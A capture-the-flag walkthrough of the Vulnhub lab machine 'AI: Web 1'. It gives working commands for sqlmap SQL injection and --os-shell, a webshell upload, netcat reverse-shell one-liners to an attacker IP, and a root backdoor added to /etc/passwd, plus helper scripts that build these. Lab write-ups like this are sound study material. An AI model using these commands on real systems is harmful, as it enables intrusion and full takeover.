Detailed walkthrough of the Vulnhub target machine AI: Web 1 (Web1)
Vulnhub target machine introduction:
Vulnhub is a comprehensive lab platform that offers all kinds of vulnerable virtual machines for download. Open a VM locally and you can practise penetration testing, privilege escalation, vulnerability exploitation, code auditing and other hands-on exercises as if playing a game.
This one is a web vulnerability target machine; as usual, the goal is to find the flag.
Vulnhub target machine download:
Official website address: https://www.vulnhub.com/entry/ai-web-1,353/
Vulnhub target machine installation:
After downloading, unzip the archive and open the VM in VMware.
Detailed explanation of the Vulnhub target machine vulnerabilities:
①: Information collection:
Use netdiscover in Kali to find the host on the network. Kali IP: 192.168.0.103, target machine IP: 192.168.0.104.
Use the command:
nmap -sS -sV -A -n 192.168.0.104
Only port 80 is open. Visit it first; the page only says that Google can't find this site. Go straight to the tool and scan for hidden directories: dirb http://192.168.0.104
The scan finds the web crawler exclusion file, robots.txt. Visiting it reveals two directories, /m3diNf0/ and /se3reTdir777/uploads/, which we access in turn.
The first path returns a 403 Forbidden page, and the second is forbidden as well, so scan again with the command: dirb http://192.168.0.104/m3diNf0/
This finds a file that reveals the absolute path of the website (the document root). Then run dirb on the other path, /se3reTdir777/uploads/, and find an index.php.
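The robots.txt step above is worth automating: every Disallow entry is a path the site owner did not want indexed, so each one should be requested and its status code noted (on this box both came back 403 until the directories were scanned). The following is an added example, not code from the original writeup: a small POSIX sh parser that pulls the Disallow paths out of a robots.txt body and joins them onto the base URL. The robots.txt text is constructed for the example (the two paths are the ones the writeup found; the comment, Allow line, lowercase key and duplicate are added to exercise the filtering).

```shell
#!/bin/sh
# Added example (not from the original writeup): extract Disallow paths from
# robots.txt so each hidden directory can be requested in turn.

# Constructed sample robots.txt body; the two paths are the ones found on the
# target, the other lines are there to show what the parser ignores.
ROBOTS_TXT='# constructed sample for the example
User-agent: *
Allow: /index.php
Disallow: /m3diNf0/
disallow: /se3reTdir777/uploads/
Disallow: /m3diNf0/
'

# robots_paths: read robots.txt text from stdin and print one Disallow path
# per line. Comments are stripped, the key is matched case-insensitively,
# Allow/Sitemap/User-agent lines are skipped and duplicates are removed.
robots_paths() {
    awk '{
        line = $0
        sub(/#.*$/, "", line)                       # drop trailing comments
        if (match(tolower(line), /^[ \t]*disallow[ \t]*:/)) {
            p = substr(line, RLENGTH + 1)           # text after "Disallow:"
            gsub(/^[ \t]+|[ \t\r]+$/, "", p)        # trim spaces and CR
            if (p != "" && !seen[p]++) print p
        }
    }'
}

# robots_urls BASE_URL: join each path onto the base URL so the list can be
# fed straight to curl. A trailing slash on the base is tolerated.
robots_urls() {
    base="${1%/}"
    robots_paths | while IFS= read -r p; do
        printf '%s%s\n' "$base" "$p"
    done
}

# Offline demonstration with the constructed body:
printf '%s' "$ROBOTS_TXT" | robots_urls http://192.168.0.104
```

Against the live target the same functions take their input from the server, e.g. `curl -s http://192.168.0.104/robots.txt | robots_urls http://192.168.0.104 | while read -r u; do printf '%s %s\n' "$(curl -s -o /dev/null -w '%{http_code}' "$u")" "$u"; done`, which prints the status code (200, 403, 404) next to each hidden path so the forbidden directories stand out as the ones to brute-force further with dirb.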
②: SQL injection:
Visiting the page, it looks like there is SQL injection. You can test it manually or hand it to sqlmap.
Check the number of columns first with 1' order by 4#. If the page still echoes results, the input reached the SQL query, so there is a SQL injection vulnerability (raise the number until the query errors; the last value that still returns is the column count).
I am lazy and prefer sqlmap, so first capture a request in Burp Suite (bp) to see the injection point. The POST data is: uid=1&Operation=Submit
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs # list databases
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables # list tables
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns # list columns
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --level=3 --os-shell # get an OS shell
Select php (the default), then custom location(s), and enter the path obtained earlier: /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
A shell is obtained, but only with the low-privileged web server user www-data.
③: File upload:
Now write a one-line PHP webshell (hack.php) and use sqlmap to write it to the server under the uploads path, with a name of our choosing:
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./hack.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php
--file-write: the local file to read (hack.php)
--file-dest: the absolute path on the target, including the file name the webshell will have there (hack.php)
Then visit http://192.168.0.104/se3reTdir777/uploads/hack.php
If the page is blank, the webshell was uploaded successfully! Connect to it directly with the webshell management tool AntSword.
④: Reverse shell:
1. On Kali, listen on a port with the command: nc -lvvp 6666
2. On the target, run: nc -e /bin/bash 192.168.0.103 6666
(it turns out the -e option is not available in this netcat)
3. Use this command instead: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.103 6666 >/tmp/f
(this gets the reverse shell)
4. Use the command: python -c "import pty;pty.spawn('/bin/bash')"
(spawn an interactive pty with Python)
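The failure in step 2 is common: Debian-derived targets ship netcat-openbsd, which has no -e, whereas netcat-traditional and ncat do. The following is an added example, not code from the original writeup: two POSIX sh helpers, one that detects an -e capable netcat from its help text and one that emits either the simple nc -e form or the mkfifo pipeline the writeup fell back to, with a comment on what each part of that pipeline does. The two help-text samples are constructed approximations of what netcat-traditional and netcat-openbsd print; the IP and port are the writeup's.

```shell
#!/bin/sh
# Added example (not from the original writeup): pick and build the
# reverse-shell one-liner for the target.

# Constructed samples of "nc -h" output (abridged) for offline testing.
NC_TRADITIONAL_HELP='connect to somewhere:	nc [-options] hostname port[s] [ports] ...
	-e prog			program to exec after connect [dangerous!!]
	-l			listen mode, for inbound connects'
NC_OPENBSD_HELP='usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval]
	-l		Listen mode, for inbound connects
	-v		Verbose'

# nc_has_exec HELP_TEXT: return 0 if the help text advertises an -e option
# (netcat-traditional: "-e prog", ncat: "-e, --exec"). Pass "$(nc -h 2>&1)"
# from the target for a live check.
nc_has_exec() {
    printf '%s\n' "$1" | grep -Eq -- '^[[:space:]]*-e([[:space:]]|,)'
}

# revshell_cmd LHOST LPORT MODE: print the command to run on the target.
# MODE "exec" uses nc -e; MODE "fifo" is the fallback for netcats without -e.
# The port must be a number in 1..65535, otherwise nothing is printed.
revshell_cmd() {
    lhost=$1; lport=$2; mode=$3
    case $lport in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || return 1
    case $mode in
        exec)
            printf 'nc -e /bin/bash %s %s\n' "$lhost" "$lport" ;;
        fifo)
            # rm -f /tmp/f      : remove a stale fifo (-f so a missing one is no error)
            # mkfifo /tmp/f     : the named pipe that carries our typed input
            # cat /tmp/f|/bin/sh -i 2>&1 : shell reads commands from the fifo and
            #                     sends stdout and stderr on down the pipe
            # |nc LHOST LPORT   : ships that output to our listener
            # >/tmp/f           : what the listener sends back is written into
            #                     the fifo, closing the loop
            printf 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f\n' "$lhost" "$lport" ;;
        *)
            return 1 ;;
    esac
}

# Offline demonstration: choose the form from the (constructed) help text.
if nc_has_exec "$NC_TRADITIONAL_HELP"; then
    revshell_cmd 192.168.0.103 6666 exec
fi
if ! nc_has_exec "$NC_OPENBSD_HELP"; then
    revshell_cmd 192.168.0.103 6666 fifo
fi
```

Whichever form connects back, the resulting /bin/sh -i has no pty, so the Python pty.spawn line from step 4 is still needed before tools such as su or sudo will prompt for a password.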
⑤: Privilege escalation:
First use the command: find / -user root -perm -4000 -print 2>/dev/null
to see which root-owned SUID binaries can be executed.
Then look at the kernel version with the command: uname -a
The current version is 4.15.0-58-generic.
searchsploit linux kernel 4.15.0-58-generic
Search for related kernel exploits; nothing usable is found.
It turns out to be the same escalation method as DC-9: /etc/passwd is writable by our user, so we can add an account with UID 0 and log in with it to escalate privileges. Please refer to the following article:
Read this article and you'll know how to play the penetration test target machine vulnhub-DC9
Use the command: openssl passwd -1 -salt hacker 123456
to generate the password hash, then create the root-level account by appending a line to /etc/passwd:
echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd
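Appending a line to /etc/passwd is unforgiving: one missing colon and the new account cannot log in, and a badly placed field can break logins for everyone. The following is an added example, not code from the original writeup: POSIX sh helpers that check the precondition (the file is writable), build the entry field by field, validate it before it is appended, and list every UID 0 account, which is also how a defender spots this kind of backdoor afterwards. The hash is the one the writeup generated with openssl passwd -1 -salt hacker 123456; the sample passwd content used in the demonstration is constructed and written to a temporary file rather than the real /etc/passwd.

```shell
#!/bin/sh
# Added example (not from the original writeup): build and sanity-check the
# /etc/passwd entry used for the escalation, and audit for UID 0 accounts.

# MD5-crypt hash of "123456" with salt "hacker", as produced on the target by
# "openssl passwd -1 -salt hacker 123456" (taken from the writeup).
HASH='$1$hacker$6luIRwdGpBvXdP.GMwcZp/'

# passwd_writable FILE: the escalation only works if the current user can
# write FILE (on this box www-data could write /etc/passwd). Returns 0 if so.
passwd_writable() {
    [ -w "$1" ]
}

# passwd_entry NAME HASH UID GID GECOS HOME SHELL: print one passwd line.
# A hash in field 2 bypasses /etc/shadow (which normally holds it, with "x"
# here); UID 0 in field 3 makes the account root whatever its name is.
passwd_entry() {
    [ $# -eq 7 ] || return 1
    printf '%s:%s:%s:%s:%s:%s:%s\n' "$1" "$2" "$3" "$4" "$5" "$6" "$7"
}

# passwd_entry_ok LINE: validate a line before appending it: exactly seven
# colon-separated fields, numeric UID and GID, absolute home and shell.
passwd_entry_ok() {
    line=$1
    fields=$(printf '%s' "$line" | awk -F: '{print NF}')
    [ "${fields:-0}" -eq 7 ] || return 1
    uid=$(printf '%s' "$line" | cut -d: -f3)
    gid=$(printf '%s' "$line" | cut -d: -f4)
    home=$(printf '%s' "$line" | cut -d: -f6)
    shell=$(printf '%s' "$line" | cut -d: -f7)
    case $uid in ''|*[!0-9]*) return 1 ;; esac
    case $gid in ''|*[!0-9]*) return 1 ;; esac
    case $home in /*) ;; *) return 1 ;; esac
    case $shell in /*) ;; *) return 1 ;; esac
    return 0
}

# root_accounts FILE: print the name of every account whose UID is 0. On a
# clean system this prints only "root"; an extra name is the backdoor.
root_accounts() {
    awk -F: '$3 == 0 {print $1}' "$1"
}

# Offline demonstration against a constructed passwd file in /tmp.
demo=$(mktemp)
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$demo"
printf 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n' >> "$demo"
entry=$(passwd_entry hacker "$HASH" 0 0 '' /root /bin/bash)
if passwd_writable "$demo" && passwd_entry_ok "$entry"; then
    printf '%s\n' "$entry" >> "$demo"
fi
root_accounts "$demo"     # root, then hacker
rm -f "$demo"
```

On the target the same sequence is `passwd_writable /etc/passwd`, `entry=$(passwd_entry hacker "$HASH" 0 0 '' /root /bin/bash)`, `passwd_entry_ok "$entry" && printf '%s\n' "$entry" >> /etc/passwd`, followed by `su hacker` with the password 123456; `root_accounts /etc/passwd` then shows both root and hacker.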
⑥: Get the flag:
Log in as the new account (su hacker, password 123456). It has UID 0, so at this point the flag can be read and the penetration test is over.
Vulnhub target machine penetration summary:
The new knowledge points this time are sqlmap's --os-shell (the first time I have used it) and the format of /etc/passwd. If you don't understand that format, it is best to take the escalation one step at a time, because it is easy to make mistakes. Each line is:
username:password:UID (user ID):GID (group ID):description:home directory:default shell
An "x" in the password field means the real hash is saved in the /etc/shadow file; a hash written directly into the field is used as the account's password. The shell field decides whether the account can log in: /bin/bash allows login, /sbin/nologin prohibits shell login.
This time was a study of a web target machine. I hope you also pick up some new knowledge points and penetration testing ideas from it. Writing this up was not easy; I hope it is helpful to everyone!